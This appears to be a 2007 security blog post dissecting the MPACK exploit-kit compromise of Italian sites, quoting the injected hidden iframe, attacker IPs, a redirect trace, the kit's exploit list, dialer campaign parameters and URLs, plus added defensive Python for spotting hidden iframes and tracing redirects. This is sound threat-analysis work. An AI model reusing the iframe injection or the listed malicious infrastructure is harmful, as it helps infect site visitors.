Wednesday, June 20, 2007

Massive Embedded Web Attack in Italy

The Web is abuzz with news stories about the MPACK web exploitation kit being installed on over 10,000 mostly Italy-based sites. In the spirit of previous analyses of malicious URLs, here's an overview of the strategy behind the attack, its outcome, and the IPs in question, namely the ones that should get blacklisted, or have CYBERINT applied to them for further juicy details on the severity of the attack.

The strategy of the attack
Picture yourself in the position of a malicious attacker wanting to infect the highest number of PCs possible in the shortest timeframe. How would you go about infecting the highest possible proportion of internet surfers using outdated software, the ones still living in the "don't open .exe attachments" self-vigilance world? You'll either figure out a way to exploit vulnerabilities within a huge number of web sites and automatically embed the malicious payload, or breach a shared hosting provider and infect all of its customers, thus potentially infecting all of their future visitors. Which is exactly what happened in the most recent case of what's turning into a massive epidemic of MPACK embedded sites.

The outcome of the attack
- Over 10,000 sites affected according to WebSense
- hundreds of thousands of PCs currently infected according to obtained MPACK statistics
- the majority of infected PCs are located in Italy, given the breach of the shared hosting provider Aruba

Dissecting the attack
It all started when popular Italian sites had the following IFRAME embedded within their front pages :

<iframe name='StatPage' src='hllp://58.65.239.180/' width=5 height=5></iframe>
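A 5x5 frame pointing at a bare IP is the signature of this injection, and it is cheap to check for. The following is an added example for this post, not code from the original analysis: a detector that parses HTML and flags iframes that are tiny or CSS-hidden, whose src is an IP literal, or whose host appears on a blocklist (seeded here with the IPs listed in the post). The sample page is constructed; the 'hllp' scheme is the post's defanged spelling of http and is kept as-is.

```python
"""Hidden-IFRAME detector (added example, not code from the original post)."""
from html.parser import HTMLParser
from urllib.parse import urlsplit
import ipaddress
import re

# IPs named in the post as the attack infrastructure, used here as a blocklist.
BLOCKLIST = {
    "58.65.239.180", "64.38.33.13", "194.146.207.129", "194.146.207.18",
    "194.146.207.23", "81.177.8.30", "203.121.71.183", "81.95.148.42",
    "81.95.149.114",
}
TINY_PX = 10  # frames at or below this size are not meant to be seen


def _px(value):
    """Parse a width/height attribute ('5', '5px') to an int; None if not a pixel count."""
    if value is None:
        return None
    m = re.match(r"\s*(\d+)\s*(px)?\s*$", value)
    return int(m.group(1)) if m else None


def _is_ip_literal(host):
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


class _IframeCollector(HTMLParser):
    """Collects the attribute dict of every <iframe> start tag."""
    def __init__(self):
        super().__init__()
        self.frames = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "iframe":
            self.frames.append({k.lower(): v for k, v in attrs})


def find_suspicious_iframes(html, blocklist=BLOCKLIST, tiny_px=TINY_PX):
    """Return [(src, [reasons])] for every iframe matching the injection pattern."""
    parser = _IframeCollector()
    parser.feed(html)
    findings = []
    for attrs in parser.frames:
        src = attrs.get("src", "")
        host = urlsplit(src).hostname or ""
        reasons = []
        w, h = _px(attrs.get("width")), _px(attrs.get("height"))
        if w is not None and h is not None and w <= tiny_px and h <= tiny_px:
            reasons.append(f"tiny frame {w}x{h}")
        style = (attrs.get("style") or "").replace(" ", "").lower()
        if "display:none" in style or "visibility:hidden" in style:
            reasons.append("hidden via CSS")
        if _is_ip_literal(host):
            reasons.append("src is a bare IP address")
        if host in blocklist:
            reasons.append("src host is on the blocklist")
        if reasons:
            findings.append((src, reasons))
    return findings


# Constructed sample: the injected 5x5 frame next to a benign embed.
SAMPLE_HTML = """<html><body>
<h1>Benvenuti</h1>
<iframe name='StatPage' src='hllp://58.65.239.180/' width=5 height=5></iframe>
<iframe src="https://www.example.com/widget" width="300" height="200"></iframe>
</body></html>"""

if __name__ == "__main__":
    for src, reasons in find_suspicious_iframes(SAMPLE_HTML):
        print(src, "->", "; ".join(reasons))
```

Run it over the front page of every site on a shared host and the hits are the ones whose content was tampered with; the benign 300x200 widget produces no finding, so the check does not fire on ordinary embeds.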

The entire attack is currently orbiting around the following IPs :

58.65.239.180
64.38.33.13
194.146.207.129
194.146.207.18
194.146.207.23
81.177.8.30
203.121.71.183
81.95.148.42
81.95.149.114

Input URL: 58.65.239.180
Effective URL: hllp://truman.dnspathing.com/suspended.page/
Responding IP: 64.38.33.10
HTTP/1.1 302 Moved Temporarily
Server: nginx/0.5.17
Date: Tue, 19 Jun 2007 22:56:01 GMT
Content-Type: text/html
Content-Length: 161
Connection: keep-alive
Location: hllp://64.38.33.13/~ftpcom/
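The Input URL / Effective URL trail above is what you get by following redirects one hop at a time instead of letting the client jump straight to the final page, because every intermediate host is a blocklist candidate. The following is an added example, not code from the original post: a tracer that takes an injectable fetch function returning (status, headers) without auto-following, records each hop, and refuses loops. The canned responses are constructed to mirror the 302 quoted above; for live use, a client such as `requests.get(url, allow_redirects=False)` supplies the same (status_code, headers) pair.

```python
"""Redirect-chain tracer (added example, not code from the original post)."""
from urllib.parse import urljoin, urlsplit


class RedirectLoop(Exception):
    pass


def trace_redirects(url, fetch, max_hops=10):
    """Return [(url, status, next_url_or_None)], ending at the first non-3xx response.

    `fetch(url)` must return (status_code, headers_dict) and must NOT follow redirects.
    """
    hops, seen = [], set()
    for _ in range(max_hops):
        if url in seen:
            raise RedirectLoop(f"redirect loop at {url}")
        seen.add(url)
        status, headers = fetch(url)
        location = headers.get("Location")
        if 300 <= status < 400 and location:
            nxt = urljoin(url, location)  # resolves relative Location headers for http/https
            hops.append((url, status, nxt))
            url = nxt
        else:
            hops.append((url, status, None))
            return hops
    raise RedirectLoop(f"more than {max_hops} hops starting from {hops[0][0]}")


def hosts_in_chain(hops):
    """Distinct hosts touched by the chain, in order: the blocklist candidate set."""
    out = []
    for url, _, _ in hops:
        host = urlsplit(url).hostname
        if host and host not in out:
            out.append(host)
    return out


# Constructed offline responses modelled on the 302 quoted in the post
# ('hllp' is the post's defanged spelling of http).
_CANNED = {
    "hllp://58.65.239.180/": (302, {"Server": "nginx/0.5.17",
                                     "Location": "hllp://truman.dnspathing.com/suspended.page/"}),
    "hllp://truman.dnspathing.com/suspended.page/": (302, {"Location": "hllp://64.38.33.13/~ftpcom/"}),
    "hllp://64.38.33.13/~ftpcom/": (200, {"Content-Type": "text/html"}),
}


def canned_fetch(url):
    """Offline stand-in for an HTTP client that does not follow redirects."""
    return _CANNED.get(url, (404, {}))


if __name__ == "__main__":
    chain = trace_redirects("hllp://58.65.239.180/", canned_fetch)
    for u, status, nxt in chain:
        print(status, u, "->", nxt or "(final)")
    print("hosts:", hosts_in_chain(chain))
```

The loop guard matters in practice: exploit kits frequently bounce visitors through hosts that are already suspended or that redirect back to themselves, and a tracer that silently follows forever is useless for triage.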

More coverage :
ISC, Symantec, WebSense, TrendMicro, Finjan -- great to see they came across my analysis of ms-counter.com as well -- PandaLabs.

UPDATE:

MPACK's Builder Screenshot courtesy of Symantec. Meanwhile, here are the exploits available in the latest 0.90 release of the web exploitation kit :

- modified MS06-014
- MS06-006 Firefox 1.5.x Opera 7.x
- 0day Win2000 (ms06-044)
- XML overflow under XP2k3
- WebViewFolderIcon overflow
- WinZip ActiveX overflow
- QuickTime overflow
- ANI overflow

The majority of news articles I came across emphasize that the kit is available for sale at $1000. True, but only if you're purchasing it from the original source; the kit has been a commodity for quite a while, with different parties modifying the source code and selling it for much less, even bargaining over it in case someone's interested in the related underground services on offer.

Even more ironic in the case of this particular attack is that while performing the cyber forensics part, I came across another malicious site farm hosting dialers, courtesy of CARPEDIEM. And while the IFRAME part of the massive embedded Italy-based attack was gone at the time of checking the dialers, even earlier instances of CoolWebSearch were still in place. The second malicious campaign is run via sv2.biz, campaign id = 15682, with all the p0rn sites at 193.110.146.69, which is hosting all the dialer-embedded sites in question. From another perspective, the benefit of infecting a web site farm run on a single IP, with probably hundreds of thousands of visitors, in the shortest timeframe possible has a major flaw: blocking 192.110.146.69, aka CARPEDIEM, which as a matter of fact is listed by Google as a harmful site, will temporarily mitigate the threat.

Initiating a traceback of a site that's participating in two malicious campaigns :

1 -> hllp://www.dojinshi.biz/dojin/
Responding IP: 62.149.130.37

2 -> Sites spreading the dialers within :

hllp://www.analream.com/index.html?id=15682
Responding IP: 193.110.146.69

Dynamics of infection :

Basically, the host name is identical to the name of the distributed .exe :

// Parameters the dialer landing page passes to its installer; the kit name matches the host.
var My_Param = {};
My_Param['rf'] = "AnalReamV2KTU";
My_Param['id_produit'] = 550;
My_Param['id_site'] = 995;
My_Param['synergie'] = 'h';
My_Param['color'] = 'fire';
My_Param['name_kit'] = "AnalReam.exe";

Here's the entire campaign list :

asian-booty.com/?id=15682
bukkakenation.com/us/index.html?id=15682
devilteen.com/?id=15682
fetishcell.com/?id=15682
flowerbabes.com/index.html?id=15682
mrstrollop.co.uk/index.html?id=15682
sexyharem.com/?id=15682
sorority-house.com/index.html?id=15682
sublimanal.com/us/index.html?id=15682
tottyunited.co.uk/index.html?id=15682
trashedtramps.com/?id=15682
gangbangdemolition.com/us/?id=15682
gothnymphs.com/?id=15682
kinkythighs.com/?id=15682
porndivinity.com/?id=15682
newhentai.com/us/index.html?&id=15682
kumtomi.com/index.html?&id=15682

Situational awareness at its best is what truly matters at the bottom line.